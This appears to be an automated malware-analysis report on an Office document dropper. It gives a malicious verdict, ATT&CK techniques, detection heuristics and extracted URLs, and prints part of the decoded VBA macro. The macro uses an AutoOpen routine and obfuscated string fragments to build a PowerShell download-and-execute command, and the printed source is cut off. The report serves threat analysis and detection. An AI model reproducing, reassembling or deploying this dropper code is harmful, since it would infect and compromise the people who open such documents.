Verdict: MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function and concatenates strings to construct a URL, likely for downloading and executing a second-stage payload. The ClamAV detection name 'Doc.Dropper.Agent-6391051-0' further supports its dropper functionality.
Heuristics (7)
- ClamAV: Doc.Dropper.Agent-6391051-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6391051-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://C5R+C5RseoeC5R+C (in document text, OLE body)
  - http://www.real-cl (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 45748 bytes |

SHA-256: 12be15a7dff32a8ce9891e265ea8baf7a400c5775339aac2051e777324a60d35

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "HjbIFjRf"
Function aVmXvtjPjUMXN()
omdhsj = Array("iEpKpZj" + "VNZMaBljIjmudN" + "dTOMfRZ" + "HTGjYtpPTb" + "EBBwqZhKKcpP")
kjIkvzBFH = Mid("DFC5aUfzRpOujGMvS05R5ht+5'+'ht+C5Rna3envC5R+C5R:publC5R+C5RicC5R+C5R +C55ht'+'+5htR+C5YnNwnrNXts", 19, 68)
XhCqQZtjsZ = Array("QKTUtpVM" + "GOvJqhMOOIni" + "JoQEffn" + "IsijdGLcizEsKj" + "OaLRbSqSLcK")
OwOrjtE = Array("RCLqbMDjvq" + "tUVMnSTSS" + "IzcVXmzHPuRDkP" + "hwnGXBJLiF" + "EUWrIXwaID")
JNASKt = Array("KGjZzXHr" + "jdTWZMAPjwUBJj" + "iwDKXio" + "mVEajMzGIffiY" + "mpbFlIfT")
HXVFdbq = Mid("zjTwTbGwRzssakCiHHuiG2p1H+'5R+C5RxexTZ;fC5R+C5RoreC5R+C5RaC00zVuv1s", 26, 34)
BKtaTClaV = Array("VDaGZfwBpjGq" + "UjMvuzo" + "PBickYluGJGSwc" + "jRbdPhPmwiPW" + "KBfIOoFBsdo")
lNXnimDkmPs = Array("AXivAUz" + "OspjAUmUDk" + "MVdEjRMNiRwfI" + "PDCBQwmLL" + "mifmVpkiY")
RUlvaRmzfV = Array("hGZLAAsONVVDF" + "DEjzOAbZ" + "CLsvUXn" + "PSToEGVjEtvSb" + "wUrNwVFDvLHCX")
fBMPfjdW = Mid("htOMTjcIBRcGVOKe-exPREssiOn') -cREPlAcE ([cHaR]53+[cHaR]104+[cHaR]116),[cHaR]39 -cREPlAcE ([cHaR]105+[cHaR]82+[cHaR]rFawnJOIIfYBLPmiOJZ", 13, 105)
NvndwzkhwB = Array("HkXSzioGOCRMj" + "kQjSmlFAK" + "SzlZsthN" + "VKfjkEmJ" + "wIAaCRBEFSv")
VONOvpmkiAC = Array("IEYqahFlmVzwOQ" + "GjHcOPXD" + "aShLWIhB" + "VazVEsuhKhVO" + "GptofzaIjkBRQH")
obRXJYk = Array("GzMhofmsImAcu" + "rkjazizGvffAon" + "PCassHBV" + "OEFkWISvsw" + "qzaIotzEh")
rGEzuL = Mid("UN8tF'/x'+'TZ.SplitC5R+C5R(xC5R+C5'+'RTZ,xTZ);nC5R+C5Ra3karapas = na3n5ht+5htsaC5R+C5Rdasd.5ht+5htnext(1,5ht+5ht 34C5ht+5ht5R+C5R3245'+');na3huaC5R+C5Rs C5R+C5R='+' 5ht+5htCwrfcPMwj3LVJwsqBCNLsZGfmlsj24Z2f", 6, 168)
hAjtrHnt = Array("tOiowPspLlcPhj" + "phscLrS" + "chbZmpwDokun" + "DhPiOAhCCjscfu" + "YnwHbjBGX")
jWWwqi = Array("nrzfsja" + "CqpPLLtcNkmM" + "HpXWPbREzIzo" + "aNGEdZsLq" + "aboPPLfP")
lujibIirSTw = Array("OBuFnkpNHuq" + "sNFuksdHPv" + "iTDvjZTDfsw" + "zXisDkTsAoOv" + "DKQDlMPS")
OqBMBDXh = Mid("EqpLRiNG][CHar]39)) 5ht) -cRepLAcE'+' 5htC5R5ht,[ChAr]39-rEPLacE '+'5httaj5ht,[ChAr]3'+'6) iR5'+'iN8uIL1o71j10", 5, 97)
EwmXfzU = Array("UTjBcJcHI" + "DisbtkjWIGM" + "XQhwvbMCsT" + "fTwuLduBSkfna" + "zviioXIFAvPT")
kXwfiqWKLj = Array("MlkoFnoqKc" + "hFWFAaWvDfuFHm" + "ODAufiNiLtI" + "ffEJdlBcw" + "KCKpTPqRjcCZY")
DosrBPKcuJ = Array("IfBCdQAKwumk" + "LjTszITNIbajj" + "nkNwwzMulSziG" + "hBzGwOloTYzDf" + "ADbVuXNajv")
BuAMzSaaWd = Mid("BA8lNDW . ( $enV:comspEC[4,24,25]-jOIn'')( ((' ((5ht iEx ( (C5Rna3francC5R+C5R = newC5R+C5R'+'-obj5ht+5htect SystC5R+C5Rem.C5R+C5ht+5ht5RNzTbIb", 8, 131)
vLTOY = Array("qQwLTbKMsLrQ" + "VQTGJhaszjqOzo" + "MfMFHTTNppJXdw" + "zwDQUBMW" + "swrsjGwVmQzMz")
LDBWm = Array("kfQvAtQCbfGiU" + "UGwQowuUnuir" + "oifHSBSMiVt" + "fjADstZHl" + "QOJvwtQrVMI")
isislvvL = Array("DYXODjaQXc" + "ulYosIOJbvM" + "iZlHmlXawuf" + "lrrcbtoYcmu" + "lXtYkqVYqttpRY")
iYwUcwQkVo = Mid("Dw547Y7tMmGhZLKku7QC4juq", 20, 1)
IQujG = Array("cUwYocBXl" + "EwIPuQvBJkrN" + "QzXFZwrzj" + "PGfHUFwF" + "ofJLmhzzw")
wVMRwKV = Array("fzCizGuCARmih" + "oCsfsVPr" + "pGZGmswCKCFJYa" + "unqUsHwH" + "RCrBKZCYnANXa")
FDMoaR = Array("YpLZJGXrjv" + "qPBRSzkJzUX" + "UvlfSPcDhQ" + "KdaIBjUfvQszA" + "HCZsfIBBQ")
rYSzzJjs = Mid("OG8Q6R xTZC5R+C5R1r'+'C55ht+5htR+C5RvxTZ + C5R+C5RnC5R+C5R'+'a5ht+5ht3karapaC5R+C5Rs + xTZC5R+C5R.eC'VU14lRIiJWvYrsw7", 6, 96)
hotqfNq = Array("IKCPbjc" + "PcklEfvzsrwloj" + "wrkzhVY" + "jTmhKpsW" + "LUnPRZUXdoI")
XjwXjnW = Array("dXbFbErtaYqor" + "jZfpcJbwlPKMC" + "CHpINjfd" + "PDqZwXbZ" + "LkIFdLZHQ")
dsOLRKWmF = Array("DNjdunFwUp" + "OVvwwqVV" + "zzwrzJREv" + "fvPZQaFPMRmt" + "NQnSRbrhSi")
jrXfz = Mid("XzGww5b53),[cHaR]124) )ZSNwljzSsiizO8", 8, 16)
tVlski = Array("mMvOBfrSjhb" + "JGRPmljc" + "JprBSCzidjG" + "zrvUootHF" + "ssDaCnNZoXnEc")
FRIuJY = Array("ZEOrilWB" + "mJOzwfX" + "aIDiDckbLrzdD" + "NNEzLLN" + "bvlqkECoVmDA")
OJDcUZcQOwB
... (truncated)